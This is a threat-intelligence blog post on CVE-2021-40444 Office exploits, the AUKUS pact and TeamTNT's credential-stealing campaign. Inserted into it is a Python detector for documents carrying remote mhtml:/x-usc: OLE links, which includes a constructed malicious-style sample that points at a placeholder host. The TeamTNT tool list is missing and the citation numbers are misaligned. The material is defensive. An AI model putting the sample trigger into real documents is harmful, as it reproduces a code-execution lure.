EclecticIQ
nav-solutions

Learn how EclecticIQ can help you address your specific challenges – by team and by need – and improve your overall security posture.

Solutions overview

Our Ecosystem

An ecosystem supporting our customers' intelligence-led proactive cybersecurity needs with collaborative partner programs delivering world-class joint solutions. 

Partner Program

Partner with EclecticIQ to bring valuable and innovative security solutions and services to end users. Open to all partner types, including technology developers, service providers, resellers, and community.

Our Partnerships

We partner with the world's premier technology and solution providers to support all phases of your cybersecurity needs. Explore all our partners' solutions and offerings to build and extend your cyber defense ecosystem.

EclecticIQ Resources

We are committed to increasing the knowledge and capabilities of the cybersecurity community through our research & analysis efforts and open source projects.

Browse Resources

Learn more about our technology, solutions and services, and stay updated on the cyber threat landscape with our research reports, webinars and other information.

Open Source Projects

We are proud to be an active member in the open source community and to help develop and advance progress of security technology. Learn more about contributions or go directly to our GitHub page.

AUKUS TeamTNT Microsoft Exploit

EclecticIQ Threat Research Team September 27, 2021

Exploit Tools and Targets: Microsoft Zero-Day CVE-2021-40444 will Almost Certainly Continue to be Exploited Moving Forward

Microsoft, along with analysts at Mandiant, discovered a new zero-day (CVE-2021-40444) being leveraged in targeted attacks (1). CVE-2021-40444 is a remote code execution (RCE) vulnerability in MSHTML that can be triggered from Microsoft Office documents (2). Campaigns exploiting this vulnerability began in August 2021 and delivered exploit documents that downloaded Cobalt Strike Beacon. The threat actor relied on stolen credentials to move laterally. Infrastructure used in the attacks overlaps with that of multiple threat actors associated with human-operated ransomware attacks. Analysts at RiskIQ have asserted with medium confidence ‘that the goal of the operators behind the zero-day may, in fact be traditional espionage’ (3).

CVE-2021-40444 will almost certainly continue to be exploited moving forward. Given the effectiveness of phishing emails, Microsoft Office exploit documents have been a mainstay in threat actor toolsets for years (4). Because the vulnerability allows RCE, has already been publicly weaponized (5) and can be triggered from Microsoft Office documents, it has the traits to become a popular exploit for initial access. See the Microsoft blog for mitigation details (1) and the attached EclecticIQ JSON package for community sourced YARA rules.
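The detection side of this, as an added example that is not part of the EclecticIQ post: a Python triage check that flags Office documents carrying an external OLE object relationship whose target is an `mhtml:`, `x-usc:` or HTTP URL, the delivery pattern described in public analyses of CVE-2021-40444, including the Microsoft write-up cited as (1). The scheme list, the sample documents and the `example.invalid` host are constructed for illustration and are assumptions, not values from the post.

```python
# Added defensive example; the mhtml:/x-usc: external-OLE pattern is taken from
# public CVE-2021-40444 analyses, not from the EclecticIQ post itself.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# URL-style schemes that make Office fetch remote content through MSHTML on activation.
SUSPICIOUS_SCHEMES = re.compile(r"^(mhtml|x-usc|https?):", re.IGNORECASE)


def external_ole_targets(docx_bytes: bytes) -> list:
    """Return (rels_part, target) pairs for external OLE relationships with a remote scheme."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue  # only relationship parts declare OLE targets
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if (rel.get("Type") == OLE_TYPE
                        and rel.get("TargetMode") == "External"
                        and SUSPICIOUS_SCHEMES.match(target)):
                    hits.append((name, target))
    return hits


def build_docx(rels_xml: str) -> bytes:
    """Construct a minimal docx-like zip holding just the document relationship part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed samples: a benign embedded object versus one pointing at a remote MHTML page.
BENIGN_DOCX = build_docx(
    f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" Type="{OLE_TYPE}" '
    'Target="embeddings/oleObject1.bin"/></Relationships>')
SUSPICIOUS_DOCX = build_docx(
    f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId2" Type="{OLE_TYPE}" '
    'Target="mhtml:http://example.invalid/p.html!x-usc:http://example.invalid/p.html" '
    'TargetMode="External"/></Relationships>')
```

Run `external_ole_targets()` over a mail-gateway quarantine or a sandbox's dropped files to triage documents before opening them; a hit is a strong signal for manual review, not proof of exploitation.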

Policy and Governance: AUKUS Shows a Continued Emphasis on Cyber Cooperation

On September 15th, 2021, the US, UK and Australia announced AUKUS, a joint security pact aimed at increasing security in the Asia-Pacific (6). The pact will provide Australia with nuclear propulsion technology and focus on developing Australia’s military capabilities. The U.S. and UK will also look to share their expertise in cyber, AI and quantum computing (7), allowing Australia to scale up its defensive and offensive capabilities.

Western countries have long emphasized, and continue to emphasize, the sharing of cyber threat information and standards between private, public and international bodies. As recently as last month, the Biden administration introduced an initiative to bolster U.S. cybersecurity capabilities by bringing together the government, enterprise and education sectors (8). The AUKUS pact shows a growing emphasis on cyber cooperation between key western allies, integrating U.S. and UK cyber capabilities with Australia's to counter the emerging threats Australia and its partners face in the Asia-Pacific region (9).

Threat Actor Update: TeamTNT Returns Targeting a Wide Range of Systems

TeamTNT, a cloud-focused threat group (9), is active again with a new campaign, Chimaera (10). The campaign targets multiple operating systems and applications with the goal of stealing cloud credentials, installing crypto-mining software and enabling lateral movement. It has been active since July 25th, 2021 and has so far infected thousands of systems globally. TeamTNT uses an array of custom and open-source tools to achieve its goals on the system. Some of the open-source tools used by TeamTNT are:

TeamTNT’s extensive use of open-source tools highlights how effective open-source capabilities are for a threat actor. They lower the barrier to entry, reduce the cost of operations, and legitimate tools, such as 7z, blend into the victim’s environment more effectively.

About EclecticIQ Threat Research

EclecticIQ is a global provider of threat intelligence, hunting and response technology and services. Headquartered in Amsterdam, the EclecticIQ Threat Research team is made up of experts from Europe and the U.S. with decades of experience in cyber security and intelligence in industry and government.

We would love to hear from you. Please send us your feedback by emailing us at research@eclecticiq.com.

Appendix

  1. https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/
  2. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
  3. https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/
  4. https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf
  5. https://www.bbc.com/news/world-58564837
  6. https://foreignpolicy.com/2021/09/18/aukus-australia-united-states-submarines-china-really-means/
  7. https://www.whitehouse.gov/briefing-room/statements-releases/2021/08/25/fact-sheet-biden-administration-and-private-sector-leaders-announce-ambitious-initiatives-to-bolster-the-nations-cybersecurity/
  8. https://www.reuters.com/article/us-australia-cyber/australia-sees-china-as-main-suspect-in-state-based-cyberattacks-sources-say-idUKKBN23P3T5?edition-redirect=uk
  9. https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf
  10. https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera
  11. https://github.com/robertdavidgraham/masscan
  12. https://github.com/gianlucaborello/libprocesshider
  13. https://www.7-zip.org/
  14. https://github.com/b374k/b374k
  15. https://github.com/AlessandroZ/LaZagne

© 2014 – 2021 EclecticIQ B.V.